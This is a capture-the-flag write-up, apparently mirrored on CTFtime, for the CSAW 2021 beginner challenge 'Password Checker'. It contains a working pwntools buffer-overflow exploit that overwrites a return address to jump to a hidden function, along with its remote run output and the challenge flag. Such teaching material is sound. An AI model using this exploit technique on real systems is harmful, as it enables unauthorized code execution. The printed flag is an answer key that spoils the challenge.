CTFtime.org

Password Checker

by gpsy / OnlyFeet

Rating:

Writeup URL: [GitHub](https://infosecstreams.github.io/csaw21/password-checker/)

# Password Checker

Writeup by: [GoProSlowYo](https://github.com/GoProSlowYo)

Team: [OnlyFeet](https://ctftime.org/team/144644)

Writeup URL: [GitHub](https://infosecstreams.github.io/csaw21/password-checker/)

----

```text
Charlie forgot his password to login into his Office portal. Help him to find it. (This challenge was written for the person on your team who has never solved a binary exploitation challenge before! Welcome to pwning.)

nc pwn.chal.csaw.io 5000
```

## Initial Research

We figured this was a basic buffer overflow.

```bash
$ echo $(python -c 'print("A"*100)') | ./password_checker
Enter the password to get in:
>This is not the password[1] 45964 done echo $(python -c 'print("A"*100)') |
45966 segmentation fault ./password_checker
```

![A Buffer Overflow by Sending One-Hundred A's to the password_checker Binary](./overflow.png)

## Exploit

`$ pwn template > exploit.py`

```python
from pwn import *

# Set up pwntools for the correct architecture
context.update(arch='amd64')
context.terminal = ['tmux', 'splitw', '-h']
exe = './password_checker'

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote('pwn.chal.csaw.io', 5000)
else:
return process([exe] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())

#===========================================================
# EXPLOIT GOES HERE
#===========================================================

io = start()

buf = b''
buf += b'A' * (8 * 9)
buf += p64(0x401172)

io.sendlineafter('>', buf)

io.interactive()
```

## Victory

Run the exploit:

```shell
$ python3 exploit.py REMOTE
[+] Opening connection to pwn.chal.csaw.io on port 5000: Done
[*] Switching to interactive mode
This is not the password$ cat flag.txt
flag{ch4r1i3_4ppr3ci4t35_y0u_f0r_y0ur_h31p}
$
```

![Exploiting the Remote Service and Getting the Flag](./exploit.png)

Submit the flag and claim the points:

**flag{ch4r1i3_4ppr3ci4t35_y0u_f0r_y0ur_h31p}**

Original writeup (https://infosecstreams.github.io/csaw21/password-checker/).

Comments